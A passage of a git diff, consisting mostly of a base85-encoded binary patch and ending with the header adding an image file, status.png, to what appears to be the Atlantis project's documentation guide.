zZoT~@UFlnFU5Juu9oA88JAvV*lqympl82Qh`?N29Y-N(b4P2z8{@R#hY^DAQ<9~$1
zfgH_Z1F2l!NYnA=RpfI_KT=dzkaOHC(8^Drdb4~HdaVMJide8L##9rUYcFPSaPZx{
zI%<ySYBfpwohslpFNJhQu`oCe;Nv4$jUac1EU&0IR@3k?0s3^*0h_NsRAQoIVqz<;
z4h?s_YY1f)4JG#vs>|8Qu<Xrjf&okEnWAo(5NKKiu=Q>s-5kGnAn8UoQ=cRJ`ZS{p
zYVN~DI`%D(?O9$nzQKMre%4(2{pYtZp)uX<@zM$A41wg$(ie4FS#4{ef>AQ9tf{qT
z8G~;>)PQ!nPk3rlpy+4OBN=De5j5}-;#b3ucODu^nT*97`CRz1u385!zl1uaNmZ1?
z1OJG!6DsF)R6Pr|u8d?vR0~|vWP6;KbGr%PiOPu3&ZnFS7Ef83|Hrrvz{n7un*RLt
zYXUp$)vjKwCPpaa>zK#=EuYe^28+V+1<Ba{Aujy|KJ`wR)#uMe9krR?HNK*)tW)i1
zY8HI`riHFOTRuSrVbihu!&EJDc6P1yo5pCkrjQ(FTKGQbxRbH@rfD@|*63=Lf;cfp
zWR{9thaFbKtrS9pcPWpC6ck-q)1YX3QPC#<71c1g)J;%JOUwa<Km-llEjVy4&%)fm
zb?VKFAjq=T0@O)x5Zzt6q#4xNAQ#OokSK9FK42Fa8M-UklK7Eq0LtT{VxLIrNGd%4
zv(_e`=#d1(n0zIn7@^?H0Uo!PC^6zrBa1914E$<dY~f8(DfbU!_0DVVSL-pe`<V&g
zm^wt9;4L;kPfqU-0&{WqyQGb&6~CA-6WpNZM0>JE?+@8JUHF4HzE$oN^n55+*xp#+
znS%PI&>tKcUC*XJ*_{MFtU5aj1(jE4ghZo0wcfzbnvD0{;f(EUC%>U4uLY>88jiMZ
zGU>3-2Pr*Rfo>*wO}70oxO|H;+95j1-)4=wdmpX%IQQG!Xm|CwaPWvQ4(e3njF-~g
zdxHD;Z&_lG_)>XTXV&tpc6>Za`HAYK7K}}M)tF@ZDjwE*XA4F7AMe+dMn3=2G^yFw
z0vb)uoV4=cN2-DIOqmPP=UH2nS*_P@TBaRk>YQ~017~S}+j<j~|FI3W+n#8{)^8_A
z;V35_u<d}IC)V<y_yH){j3v?Cf%6~V+g2b7^XuNsNab!5!w)VypPtq?QZ;SpK5*XS
z^>KLv4xRg8MnCh~QLQLF0Pau4l3E^mwMDKK$~_N6K&q)BPkgbujkjF))vDD6^E^3*
zEk<jNsaYgjuFo)$wwjyO4nBDw)z@5b%ytP$)yw8LfwG9K&T3TiRc0h0P?jJh*V;9a
zuUbB^A94W@wQ$u&;3@E+>A4X~9X~QLcno5<BXk9S|NKG+@?2#%H#c@u7vc5&zOH`o
zTKZojZ}JG*YJQ{p&x7e1aTp)54&2_tPxl_@ls7n8L^tD|s2vTqk+_f80+16GXIn$`
zPD;(M>MbV+-*kr0&eB?kX|!LJ85qCpyrvkRRNfU(nIqI$t@ZIf5tV4PZWf1dyEnYR
zJt#FCqw%Y?%<;q|@ZenDZCL?L+jonk92U|gU$aY$811c!oMRpKo;&n}Rw+(uk}oi@
zxeUiZTU-_E8y&HO-&~p*sLcuIE4BA*glHc8*JaJm3Z5|P=@y~a88E3Bjtx)MTQS<w
zq;57?u)XbW*5!m3`_m%|Q%h^^n%0{560{~5v0Z%FWF=A&#_E_QXi!J342}Bh*fr@E
zAy#ulD?~&TY4&{LS#eeQ-0C)T3Ek#=!td6Z`>!Ud`@Bp?ksHfl{T^qoJhl_UYBuN8
zmDV-la9U1d)E5eh+YsbO$s1Ed7ROwg+478lpC-wT9Er?m;im%8b72PitvtoXTq9Q=
z@SdiA|5+1^Ou%ULyl=Im@gQ`s_WjuSd?#T4s``7B5Xo;b?r_?*l*JFPDRc{ordZlS
z?vG?~HSQgQ?q+yo#j)e>BATiyZ$w#p?cQo=Uq;Lq*k-}!4hlNZum1Qy*5AH8^J6nV
zW8w3I7ALrW{#p3CbFCWzwRT~5&1K{xQsi7w788;=Fpb1mPta(aI5w!Lq!P?xJhYR_
zW%=oktp3o}iaKAFfU4p}RBS%f(w=dzY6|&6KXWJWY{2>Rlr|k1aY^kXV`L=DS({EY
zh*D^tp_`=ntBT34{^7Ox5s44)cd0z!igUj25f~F|7|dcnU-VnidLX^TFH{IK4T)TQ
zp<VJPPFJ)lhh|GUcmzy~UEvAEoD>$H&Ibc<I?h~8<@ZF`-BxrEmzewFOLmp{!)Y8i
zSI;DF1~%irP2~H!o63QIKE0L0lTS{4CaNP~3pHQui+yy`zMSW|K@ywS7l)wt!8%Wg
z;%#h_u?)<+!lv)a(MMR)s5A&@c}iOdm{N9FeP%ZJzHC?V{n58WO$dFaBquHbG?bMc
zL~kx9rpA?|;BzzgtYbSkgNc<k!!$Ve07k819-J<k;9fxN$ad#hz({31LTpK2s9&zy
zt5odYlab=h!hdV<Ek_C=>HF3p-l(Rn<BxAH0%sbMaWJ2>j5v=|BKGoMlb_q)KTgK(
z7>D94l37YZ0{D2LuDkOLtCEsJKHwQQ9QfnM{+WlV2<zPiI7!q?u~tbOht5~M<k795
zf^~GgSN)(WBj(vA1H)#pe`JBDGnuh{1`SISqj&@1m3TI}J95yy+R>NUyYbofQr$Qv
z0>MlZU#KpFM-;gD2p$GS8zmlCz1l5%c`a_QX}OQc$)$eot&_S@J7S=#m`Hs})MP5Y
z{pKA4508N|FQ?O?tJ0uovUqu_Q<xbO2hMp9esz56x^*VE$40bP6Id}~sGxJpXr;Vp
zWQ>Zt<8EZ+chUV~vRgbB{lh+wl$)743g)C~a(bhG5J%DYA(A`Nf7ODR4K7jWL8h?Y
z7p7c4cfT@*`v~M*8<k(g=*jYg+b4q?0`uem;OxJYJOR}PCEQW4q@F7C30m~Vo~$H%
zISQYvt}$Y~ac$2J;vZdSrTCGRdy;kYq8hsvlYXNJ4k+P4+cUX6)IRGq*^BMP997T{
zNV;jStu2H!rY_FQe2cG?&jG;XrSE6?P-evuc$%-DVy0B;#vDp!m`&$QQ03dS0zCGN
z^pJ6qz*8X|?I(VS*0NpE2N*w;be6-vXw424;O>miKTBy?ec}F?RMh^E8T<<a1=*oY
z>!zdr<#`aru&h4aUB1p^;k!J?p=TyFm&1A{^TumNesc0Kpk!nC3?y?=gP+rRW_4?=
zA1BkYxkj?3gY3P#EvM7%0W&oINZjQk!MRYY>PtW$wH9dK_3Js?CMPIx$B*LA)%k|c
zdZdC|bql5pqJ3{$$y@Y<0y`oS!NNN5X6PjUVCkOt?2kQ2BX&uD7>Ki{VzfHl%;NJp
zhikoZX`^0M9?Ey7@0lXFuIV(Dsbii~qQ}ttW4K6T@T{hzRj8-gT*^~^Oh4vq?XIrg
zw%PCgr29=U;suj%GE-t|hingVI)>gdCS4k_f8d!mwIN$DU&iux$Cj2#^&W>QXnfQ&
ztc7BF%IEdD{k-wHG=d!90!YTjR@TsinJB~BSTcM)K`|(Et~Z8tawhKGDtRbS7Q}h*
zw8Q*~d1+3IlDE~IuSR1dAp;Z7(}W+=(6Ku%@Rn*UflQkFKf9k5ifA32_HpeP>|~x)
zq|TAhlk@cBa;y}5=PF}*y{pQ&8sgpIsM?pItC=`n5@pBThO&op_qMO~ip_D(b@@>P
zn4u)7Vq{C^HwnTxKSS(_c2T6@=a8+bd$cb-*Q`s}S7Cj#dd-%LOY1NWI_}&P>by5f
z88<qcIY6+-xY0N|w)!cNr#uW{n=uPac5fcNl{dREU8&+)4#>~vdgNCjVZAWu>l06G
z#86dPTzn5QRHSC9HZ(QV&&!$IKMPV1s;6#|6E+ywV)x1##y7$vBSd?+Lxn24p4cr0
z*{;yB2BziSPO4fyD0e#w!l~Vlmzj3!jq>gKmG>)|c|8sY$qzK?y57fQUBRL>eE~6e
zaCxAb!tISTXtivi*JLoM^y5Vt9%=Ew`bDLz31PB19yqW9=4c{gDQsWpnLJK2do)M7
zA31?Yw7d!^RAcG>N$kehRqK(=3WSp7fj%-OhP)D?)IU!^MWsbbEjQZsh9>jea#`#j
zW)8*^N4<tQ#<N`7AjUSEqd63j%@m14jnd_;%MN+cNIw4T3c9@fB3Bqk#S*PAZAfek
zD8o-p9s^xlIE|g|di68F^+0dCOcSQn<7}nWx27gzK9!{Bkf_di4-d&9wQ};@@EytB
zFQ&|EWXx$7NDLw;CK>0`EZ2=$)v(@HQLlte8hn78$#=L@G$zUo)h~rxB0-*N8yQ|X
zYXT4VQTje2@-e^(MygrQwofeyopIxiJ3L%@Y}iF&mrNZRO>`V#I6b-=A8x-0^BYe{
zG3o89U)MHoUo*H}ViRjW+wSoyj%JBF@>KSpjP7Za-XnRYerRQ-HGdl<6o^>JNrnY}
z>GNxL6L99!R03R%hh^k+!uH|YF4VQm)+*i8*ePEz0Y?w_E)XiU0f{3-39Y#Vkl#}w
zEgSz6<n2j7uUY44k_6s(zS+_~@wlov_Sr&FcuhmEA(o4KP8~hN%NMEo5@!3F0V*-b
zfJnEI!<^K)u0ejv58CJ_!$IsTJOe^qL!}(NI*}`Ok0?yhjj@m}p#71Fl{YW+m3*!o
zAwKiinXEyLpD8KsXc%F<v6|$_pW;vLmhx_e(s#npv51?2jzPRw01?;SMPoz5+9@ii
z(VJmVZl;k-MU|~lLDD?TcTt|!RQ$Bhe?Upg7PU2>v$vr?U3@YPE&28;W+5eOT%U+U
z_n8OAJjWF~M3nGW$%B2G91XcCFRv&~v=GvkcGw~>KHR))3Bp=^0Qgn>oI40Nw=<>B
zh@N6=f*<T6wQ;<(I?kXRA?HO<2(ej95tiZMDhYXA-4agRZZHQ(1-xiKeVZuW(T`?O
zI4v7NOf{q-+Qr?@W<eUio=Xhl^K%l=`+hi~q1}bmIG0iThq(N}@8KTj_9O91ibRF0
zj-k-%uW4>gxk0{Cx>bL5?>XVeqErAdEU>70tC52s6W;MqyjUvgWMwB!pCx)}A9T|-
zM}#OK^U*sqGoL-{ZvS~Xy3uBwfoop*SeD_oD{O_jh=ShP#KznNU<{oqKrt`tgwy?p
zGIG-=gZMe$SeK6aUNen#uQ=ftLwW>nzE)t+E=744=cZTS#z3Y7GA28O+V@9{x}Hwh
zjYN?~KW;pSwVE*`<0tl8Lc^<E3U^@_udD7O(EaDdgK*6J;U@;V;pYoH8AD|im1umr
zA{j3Ee#&A6JyoUfI+sKRjCh{`@V>WFC-#4$hur8;!v|CA^&j@&RheIx&^~D{VPu}2
zM}zp+J~Is}N3(uvp8#$j%qZQDGM_IhKWFX541)-LXWXAVhJ44`2y=umZ&y@DxCcJs
zahZ2x=E2Tmg5w%Im#2pVVtia4dL6KdQ-oMks4+;f7aUs5YLSzP{@4X(+<-NfFHo_v
zjOiHQI@1lIvW%Hxcf22s)|qDVDR_isWhwRoKPAT&v?reQ%vRZs_F(2Yf1@9i%m>OY
zp#l;2OIQ}8@+z{4B3Z04k90rn4pa#ULaOq)Z(;0Zh1IhGd%82o{c9I{g)!LBSGmuW
z_wv#pm#RA+cm)?5alleB#zWKy$+u<*X`L3gB`ozS!L=*Ca=1DD8puQLH3;rH85tZL
z&k9tf+af_U-pi=KM{EJx7Ye2yH5>EQ1<#xM)6{Q7pr=V#kRP~VUrC@fH48jccj=BB
zPT0v0FwZ8@HCKbtVsYAI9I%lEm<Oyjzy1j5XzUotjIDi!qA5m{CwoyD;yY!&S=6vO
zmG3A>7?E*XmfoJBsVRPTO;tA?kLEYo4!&=^q6<pTw^IS^YcJV4Umb<J1L!R0SQZGa
z1z}}{TGztpt4EyIx`+5y^z&FEnqc3}<EEUh@O<T62B0gA+ixWwtV2tjh|V)yjXOnM
z=vdq73&o%SkiHJ8fROgG(x8m%qlE{ZZ6`@c5$n9Sb~m1c_u*|+#z=cZ>5@MylMX%+
zfA?=orUTrHxcZ0h>(V;xZ`$4t8R<wZueVq<G-U(ZOH(8S^?ih{M=jY{>?5hx=^Xl=
zdBzEj+pvi+Is-=?PD|A-X1Lg<fEVX!N?#AXA+d7Lg(xPYvi>cD8Ir%kBl`qU9lZ^t
zdlTc{1{akmMqRDqDbGlXe80?<S>t+_6^xBye?4#3;&#vSYf<i38g$R>?1sd1kbO6<
z%UDMQO!CF7D4MJ9WD@W{sBk8_-Pc&*t>*L_d(2$UFRD?G)@#DLvH7p)<Q(5@f-)F_
ze!{q9km4;J>>4X7?t4T<ramcu=N0(6kL{WtiFn0u__e%zy&v8iU`&}m4>2-?nU4xL
z4MR6-BhM)JWL1l*R?t_0E7<n){#oQ+OUv*{ZRXEpk4#crT3))PCLD`KLB1Qc+oTrS
z#SovRNu`nd2S!ZoCf^=*Eu{1Buv2ioHcBFGxswQJ_KgfQGz=Qvi}CD{aFK|&roCHg
zxYbFPwzfXOr%F;YaylM7_6?~~Yj#t_0@6fTQPm8OfdC&{2Hjrx?_*tJJL4PBv6WMf
zGkNV806q;wRr{Xl9mS2)mF~C_wW=YlA(WroDFGr4n6`;#G0sie-QMuT8jqyJEw1qM
zJY9UXg3~OlTyD)-P=@G(urGiTH#nFKVFi~u2%c4!2Y}nSYJ*$wLHd<)hnh+t+fX>@
z_I`wh>5d}F$U;vKy>GC4@WaSLZhj%|#Httd{Dmx2PAxLg)h^S^&1r@S@gD#9l|B&V
z%m?2TYsbTVj^Z9UsNCM`&z2POs*yT3&m8H!CvXohl1nct*4c`|8wy3B5mFWFv&T-}
z8F)Si6sJ0Pqa*O);W@fO-}mEdO|m1Rgf;G`&U^~&%}HQXWkee<<Vdn$th?-&8pj78
z4Xr;>OJod(3zxj>cOUrMen8G(0tgl`xrg=>3glHh;)gdwqtp!;!Ays-TgHNJ<K`X$
zFCHEjK2t}-pH!L!Ua@axJzd)C>672pp0A)sJ;Z^hgQ!2Qv|U|-EK3CB>HiQ2KC%XE
z^{-<S;4{v|Fb2QJ=J$x+fQ>@bS>L^nP}M=I$&$_@)lQsaw)62*24l(vmO_2Q>uvr_
zR+CS=^TjrSufL{d#a)dd%&8B^h%U_VRes$ia7aLAsw>O)aWf99`G`>2af7UqCVS4F
zC8Y$uwP9IFhp=pCy9O2TM9;i_tU+&+Q($XG6rm|=<a1s0lo(Nx>Jc7+z;_w|x%yWG
z@VLo3ZaG`B*vC{({LcoQZtOA*WqM7@1-i^|v^@(ojhQ*ZS8j3cgE(ha_7w>ZJcCO9
z6rA>>yL=mKtRa0)jP}$6TE@O~Y|Ro1fGtaiFd!6J(Qxh*u1VFlH_hBE&qkY3@9Bvk
z)p3~NlcB^3Dd5ZJZ{C#O8Z@3m2Q}_#gmp&04fYyPMr{?<wlxp>X$U_|As~L3)=ox5
z2@2^6w5*ML>B9fWiDz=S@L7GT<Ra}GCjSfECH3lw_g6~Aj#M&@YCy;Gso>~h3Q}Kx
z<T%&%0=PDCOryJsLV7W4@Mrac)S2|CPPoLoBME87R_7-^5Bep?`bU(PwK{2vlZ?S5
z$vRcFjAFvFN|Scp#+53*cD4kRYb`s{PsHT|iNb%)kSz2%vd??#gAw%m<kLjwDKPbI
z@kK-Lod5KsMs9baEjvJOioy$5$<H8)DI%e^(R++pXipWTS#jhI8+(pF&}*S1vgmH<
z0g?g_<PDDD#6p(vk;y93eJgY)L@_Qomv#Lx|MN8l<5`mb{=RXXNB3p&#Uow6;Tp<G
zYc1OT6fyL5nP^=cysBuh3h;KYRa?W{zKB(nub8L`JA90F&$mlgi!LHq>+MJB?st`=
z=CdVK!;<78cu6{Pl;BWas(NCKtaNSyS-wTm^NE`=o$0ia_+?#i%aLV10<<D|N0F!G
z4|ZKk{gxY~a4)yL^(G_{CimKPCM2Tn+ILKMuRcaV9=FaEyLkHoSR<h7a=GC#oZE=2
z!8PCi3wGL9g|bZjzPg%vXe~@64^ktbXMEW>Tfaa&?ZrU6CGoiKAlZuWd|F=_tIHtq
zYnXu=q5|E~m;sYLB*A}31cE0n$9==s?}wkL=;ahV4D@S#VrQJ01_#<2k1{iy)JP{l
z8FCf_hk}%jYo;TTGepbcA+6|XPm|Y{GjWy!X_)M{HTNjiKD2ZdetaM6|G21=GGkBL
z?)g-l>bg~|*)R>sUjNqLm%VyJl7Y7~`6Oc+6G?hIJzW!2C2t;WXhwn%3pWPKgn%IX
zWF>L9ys|YpIT<{bvF>iA(V~L}YB(pjHyEMXmgmMH;p4;cqTyb?|EeH=k)QCZXTIWz
ze!SBFL9ODE<Y)2%+YdiDr*Yz#O^Q@DMjtqU_-9snRp^L_3T2UzFjN2Uej{dOEr57I
zBTW0c(DTi(#s<BXi>n+)0V=(>Cp#iR)+)a&L2s-hhY6nvUcsMNb}x#f{1#1$QE^~S
zv7CE_xBI&sngu>zHr;N*+iIaEbwS^YRJi@y#c1CqF)t7G+<Fu4CW>2=v;9^tT;}rx
zR!o7z%Yq476Mkf`4%p{SKB1n+i1h(xzE(BOhL(#%{I@AfhnJo!ifZ$cy#1p8_zc2l
z7#?2EM6bVc_V7CWu!a4yrNqP<?1Ec4cfRRR5^jC$4#X>{VA0#-dzJD!HO0gPTSC^F
zkBFPz(7}GmZPIOz8b8TuJ<YSTCjQ~YU(h`E(?sI*7>#v-5-8e(0Lm5*w)l1a9YaG@
z0B=RG)C9Yf?s)Mlc);)z0WW6dwWD>FeeXV62{@~-IsW*I3#d?sc*rXFTg}B7S3&}7
z;FcjvSy@y4nTW-0WBx`=b9|qivN7(y0Mnk$e1&wLzvB!H-M}Jpn+lAmf?-D?CP@mg
z_K!P#S+k$V?<?+UtX;jioJymmv6kj|LGk%IrornV@sP@mLcx;_KI|r{Wn|WaxJtpH
zJu!vAN`1XMyT)-=;;Y~8XF<+FqdaNhkH2>@GoOkQWoW5iAQCSPA5T%TNjwFFE(aRE
z{V!krnBy<MZ)>ElqO+~RTsO+w%aF&~T$;tfr`cT=%JgU`m(FgfzZzwX_e+!RcxoXz
z(ijgMQDYw$GN@GS8&l$uTV_DkMg=>@(iA{z3P%5d2b9MtgaGieX3P}JpXF`6Fk%wh
zj^1M`9tDK8x1bhl&#u^GgX#6#KHcz@UEHbb8HOBFn)%kXAd#T2>W#LzAn5tDrw(2n
z#<K;VevQsPpKjPGc$#fLOU}#BM=;)}OUmHOrZo*yPGz6wh(z1qk2Ni48yVi{{RQgU
z5jOx8uu_`uk)@;|*J%(r-(o!g532m)LMviWr2K!`nvb{P&eWF})O~9pj!mAA`Y%+n
z#}GcXrN!dW1vod1u#VNKyAAEMGO!NS1T>2afsYl_1R#6)f8Y!+>K8DmT_YBL2hSKW
z)0<{IxmlHA;a^Y$a8T+5xT!3h4vjB=pPifi>Tr(+H;psN_xl(1rdj$o>n=4R*dnAs
zg12fou%H|MP@E8fE8k(wuZGN(Cl;!e>3knTj^n+Zl!fWTP172;V38GD7wd!4tf^f?
zw^DAKa*&AftQz&)aqxxtSLshhJ?F*)me*v8(gs8^n2|p|oFbDrTvBhXjHc-i#sCxt
z5-jDU6#Yf6)OB31+pQJ<o1uf0C1r}W+rIwNd_R}i2$L2uBi4Kko?=)d#ddb!kF7R#
z`}~esNa&gHA*h7v6^@5o3DT733yic)TC9yy3nCR#Nk&M1`#c@EX*5KgQ#}a3d&{y$
zHqeH{ctTbpdN*?PigPMkZ0OKON?GUR)&U$ea;HdB;0#uOeZ?<xXHoK!E=~-fTI=^e
zccAZpcWm(0K;!>@He<C_>{`(F{bLh=h1z*m+WR<@uuU9h6QzMS0E~y%-=1B$_II|w
z2VUG@Af8gi#(p3zjaFfFAD+E|0zWb$(w0MBT2Y=q|D<uMhw3lrg+lI5&vbX)rK>eJ
z<QvUObmhunX%o)@bvZYzLVIbKZiUm-xRs|&gT?)eOBO<7?QMwdRHTX8<eHjlm^+t`
zKU%a$b=f@xlP`-h`V5-f_2$iwyM&)?flu|Lx{F3s`;w+kA+P(K8^Sd(wx4*KoouPt
zbw<TizjhMH2aNsB?UBw;^waU?L)<^XUsP8#|3A!y!#51vK{}V@wXO~;X8Zi6ESEi_
zWCRQ>H)1RD_kB+-&Wa-jA)XdOmkf!^SmNm>|KL7x@9ihG+l~4>$0?<vVbDBRFKxtO
z6V(V8f@?BH8pS<i!a_%Ym9%nRtLT@$3t)csB5+*BGdDWP2vJy#;#QltGcB?$gBM&*
zFgcKV*M01Da;6d@XnTbHP>qb0NedaHa!NNI_A_SNzWg7v2cWTk^9h>q_*DFjMBb2w
zUo6zYxS}X3I#Doz63F&EGd<L>f<_4EHuGBEGzqB_^*D`<@Xe5a<XLL|S#A62oRiD|
za_*vmPUAQzBhIXN&&JZSw~1(_)~z3wviA3COI%La*4>)e(k>f9C>(wUfk!6lYL*Tr
z`KL!S{xBFzDO`p%N!joS#FcSx^c5b`AzNi>2vgG?1+vbQ757|2`<aMQJ>$OtOz)0<
z0Hjzh5F3#Tz};#gVR7*>_0Pz3>-0$k)dvhT>^oFLM}C}w_N=?6WDLK(Mi{E8FNPOr
z7pJ{&_vCQjD4&g$@&2q=50s*%Dfm@Z<Yx8c+OACWcMSBRf<N!OVHMx>gY&Qg1F4v>
zHwM5>Y^0#EolVk^PcV|k#sD{)YKh01pODT8F693P^5(xo6$kss36__2ODk7HR=sYW
zrb*_g)OOx20!=ETeDY+ZKRQ1~e~19Wz-*?F=xc={(h4#K+NuaMvu!o5PYS`BDSa8-
zxQ=$^L7S#R4Zcd!lkB|)4%J{Q(`1ArpkuQUQ4DvN{ho8YopLePa~J7aiIU70!T|#(
z=aFy!V$Zu5Y7HgOq@jW8>MRS<et0)25P_GwwHgc4i?G)SFj%H~!InkCz%p~K*;>1;
ziMO*mIo@+>%!?^T=H(!BWEm9q3d9IQlggoTeoqdD7a7#=akgnWf@4iTP2?)o&f16&
z182p(+vk3>+?9H0aiCw2&CI3mkoU^I(fk{Liy9zE{g;RqAgW~0L(0pKj+*>RqoE{E
z#!SBQ<$4P~K;AJ4*$Q5#RWsLifkX6aQaXZe`_{;MQn7B2m$QHQ(?qpFAa+08dGM+c
z@0(nBY7`c|C$+{omu^X*h!!Iaodr?t2P!re{?Q#OMcnl<@MUk0gAlOg-CLoMLI%72
z8*EJq<s+X9tWv_}CMq0JmW`U=|G6Lfj@g0AOG3ebq@wC@(Pl$4H0mLa<p_Z4Goo02
z5F~`-PO76|XtZNeyl^S0JL!|F$Bs~<QmR?3@3fC<v4G4Q43b2Qs<r?-A<j2}H5g;K
z%iuAnv44*x#kx}9eqtFnYR4#;T7a1A{x`JM9}n;QVjmib^*0Y1N()+xC@F3JN~{Y=
zaVWzEfW-=}o>Y4<{0E#$6uTkW#esEVvk<tZMsjg9RG<}z7}imliRCHrW^lt^+ip!Z
zy0zwQ6kP<bcd*#c;)o>?`i*N-WVrW)Mi^J$Ft9iVuW$>D(egX9ad~nUB(6@^DvFl*
zZ=~%t&tC}3y#7!&hxVm35MKdUe9iV$Ci6Tj)rfNq<4k3_$yKet4<1x(5w68#(OYxE
zc)}18qDeGbhgQ7vPKMh28Z?w{QT_#1baM@19TgoRnn<mPKthkN@k<&-vT5iS>2U0A
z#9C$)nDOk@XvjQM3Hg73=-wf#xo7Z;6`fKikt0H9a)-7?_KwJ3xk@a!ZkIt>MpcSb
z*cI6!@Ng?@#3#uImN_sVV%xvXrbF7{#1z1VLd8ngLV3;O*kX?35@m$7@_#ka0Mu?`
z{sz}G*5O8%CXtUj&b1j_K8(9PQv3~x`%8c)o1wqk)N0ghXlGuxJM68#Md-HQPU;y{
z$+*a|$wIFtk81zQg6b6yTep|E++Pzf50bxU#HxgcD3>vOO5I=?34urSB7tjg5-N8$
ze430DkqxPIXOocdDI_E_{ADe#qH*=0wNGbyfd@)_?2q(|!_5vj>h@v8eqQl5C-`3m
z^#5M^*w=<)K%8O~J6i!~HgtAh+O5j)xgqKNi&Mx_8~M%v<mO?t%Cp+Rt?=(e1_U?Q
z$B>~CCI6(&;RnY4SjN6UY%TZjlI8usl-0W+2n+Y+qvV#!{tGY9JqIVPk!hu_vq%3g
zF8zPK|6kz=v382<J@`bnW^3#OI6szmi`)@*rtrHzzx!I`t)0_oc+7n>MmIo=NO$C)
zpl?{3_qT(<-iGd2LUEtFm%@FNFNBGbtGyxV*Q^hd5{PE~j0M&VCbSQ~m%NP!eVR?$
zynB0L;G8?*%NQ@e(fY?>Gl0N|ui+lYX|BB&x_I*X(-uvhH_~qG<*fA9FBB3uZN&dH
z7e}NGTs=9tacfo?`P+;ThE{-tLdW*;P59tpJg0k4xEeRK1pcFau~jTd%;Dd?CWumh
z_G|Cx>0)ALOyJk$#uRkZ498*Hei!J?dHtT_i><qLz!!#eK@`Q;ozDyp-=yAVs`=#J
zR%(Nvo@?{_%X$RWp3l>LUi@Be_r9)H_6C4oHu)K}8qtp4YE0H|qj<Ho^9z>mxN5Sh
zzOJV>+pnB4`M}ra**}b+d!O#EZ%WiTww!~y)+}GT6s|@8LGwl-DXHNUFvW7D%-V5m
z%RHfWL*e-_!t0_am_y_K0fxrv+UVF+ADA*;4=Fbov)+x9GprzFzz*5L{l@0)w_|-j
zq<A`5AoNCzuJ@v-^V+!XDmVGT#geXH(M~g19;fCl%rCg3ZDH|^+@_c85rsW3^@$xu
zPN3$EV0Q~x9>C|<^{M;u!Ox)o4+(gSq>9ggaH`oA%hbc}0!qhAis;ny{ws*boj<$X
z9J1<hjBnLOKcZTv4x-zSV|D4a_skF3Pp=7XVW7#jtiSlJiv$rT#qlMm#d%G|X5;b9
zjk>DsKsV}Ne-s1MDTX!o2YdE@=6kekPu33@Kr?P?E&*nk?wm_oOk4Yb1*X)PYM%@D
z`<Ga}mdm=OpHMadL|LRBtQSq|TSd_q+}0kmWBZA;N!)K4%(>(aNK|e%X|)D;*`1bk
zSEq@7pEf`f>v7~-l!AVXuaM(swBKJp=y#3Y=0v++6@R-fbiwa`P5FvbIk8#PeAcJQ
znVFW;w-}ArvYQR8*@=oHvwkb~PKxErd1efKPl)VK3WaQ9F>j=sp5<PY7Z)=O8T0$z
zJ)WHpt8|&@d+b3yr}j}eXuAD`!72aSpYVsvB!s49c)aH=%Fd4Y$@LaWz0amHH5;tE
z@}9#qVp+U-fjp}l=RvZ6-htu2+vQvADnOoV;Djj2b0!@6f2z0^cc%9+-XfP)gcy#c
zL$w?+Q5riL;$dCTsm>;Ml6l-?h_uyHq{YOMPBY=DOsbhyDAU?vG1gde$)%;!M8j&7
zVmm+Q^gL~U!TWhH-_QGbzu)KmmO={08q2=OWr)0)Y7<?7LSIB^=k*?Jj0d&fRUlgB
z^s*>H7fIHUT5W|3tAWDH?<xLyOQTI-(*<2|#AvvSW7X7rEy5PLiV(6C*K#m8Uy8@m
zvdKZmGLiYYg9x72c~J{O5{6?eBnWknkvnMvuDgHCtp81}<rA9kR`>BR6LeI|iu+F<
z>iAFVSdB+X#Kru15|L|}g)}*EH9sz~`4`GrU4(>Vb~SZ0HYD9C(DC=1q8-DOUhlND
z!LOCOLW4hv@R=VvvSkI}L$fIT(So@5U0w<)0fpn|fL$#~V3sa*v!L}ZQ3@9ilio*)
zp-=WW{0bGt2;4)<s#4#X*-*W-ii*vRcTfel4&`OpsI-b?E2E;eYJa*Q{Z7mx#|5k;
zLKG}(un}w+)haok<Ae8v&ci4pjl(Ay)a`3erSL7sp6z;(@7GwTY|ujmo(#W@C6x`J
zpt~3bah8K9a!?3EgZsg8Zg=+L`phVs5DM-Lt##>;c9S!xFc;fw@VF^4lLvYj&rC%l
ze7g=~;@^FeWxkh|ULDxZg!GRVjEUy<s_Kkz;ERuCe6d<v0{r8@N$E1oBaPD51;f_l
zj%s_K{n3k>lheFCgux4T+9p@{i0+iQtP_Jym;R>R*!L2iEVHBI2bIZ5ZViNw><md)
z+XAM67Sfh}IO!X*BB*=Y5$2s|=eSRolwtdq3`Z!44SYR(^UY3b26W5E{+$AQu2aK8
za4t+)uNU;&D3`R4{*;4hzM!R7;*pnV$(k2_k1bG9iEP;>fQf44tfpc!@~6pHZ(fI0
z@PP~ZWWg6D*8n_PcuhYLa$4_tm9|jX91Xe`*o}6z(>KwiM%ep|lEpoF%C-2eiZtU@
z?46D4Be&nT?TMvDy$nr*tc?($E&G&;oCeuINru%7E9S#WyqUdXu~8P>4w-$NhwAT8
z^rUQc3%umr-ZCS;A|mjl5=Z1q@bj-_NSV2vX^#mMv-(AMw%|x++EboPl5G+>Uk;BH
zQ^r&H!ThY!by8$osO13S#3P?twIg^+GgulA8>|1G^o-sTlt&Vbpo~#N*4kaLjxEDJ
zeI6@%M#zaX)-E@k+!9TVHfhfou`k-f*%zDZWE{+WmkL_6Sok_a&X&gWxrrIGpa)(m
z)Llu|mA?w^&#g5jxwT>$)8vH610KB@*EnWxFJFSQ@Ay%$+T5Yb@na0}!HYIANowi~
zfnL@=n;?^4^+hCqIyN`;k9G@X6;4xCIl(M|)@n3eT;8P7*-1GSaEoS?!8BK0&UGgk
z2F#`tdS5YAIo2zjXjoKlS_%2HX0yt1*|>5E4d^gb>=ahjij{-At}k|t5L_ox-`G_w
z7sPcYew&(VGpz)8O>5$OU#x1VF91l2>L>h%T(79q6j5hQ0MM5;<eW*S8o){vU{VfC
zfbLTXsJrHWS^|_6fj_DSP<VZrN=qIVs(YjH7x7%%3Rb<Vof^Oif57AtI*6z44QMa0
z+)NC`Qq=*<VL*(zLciq4>vSGKkK5k;|7rh+Mm|$QB6g=34YOd{S@fC`(zpTHITdH+
zJcG+ct#f&s!>m&Cw*0x~(WBN|B^F<p5&10V{TO5rea_h(`7OLmzYl-<oR#NJcR0gO
z#c4mAmB(wJclvU0Zdr9`tlR`Wrz)#AuB>qYHG5JykgytiwN$dafmAm7Zty@Mr_3Yt
z)dyiy+;WbFjQbXT?!5uD&Q1ZuMv6t{RFPVE9fUwFu3_5V{`_+(YWdn@-2IJG!|Mh4
Vv-O7ZgykOw(B6Jt_dLVT{tJD_=#&5e

literal 0
HcmV?d00001

diff --git a/runatlantis.io/guide/images/status.png b/runatlantis.io/guide/images/status.png
new file mode 100644
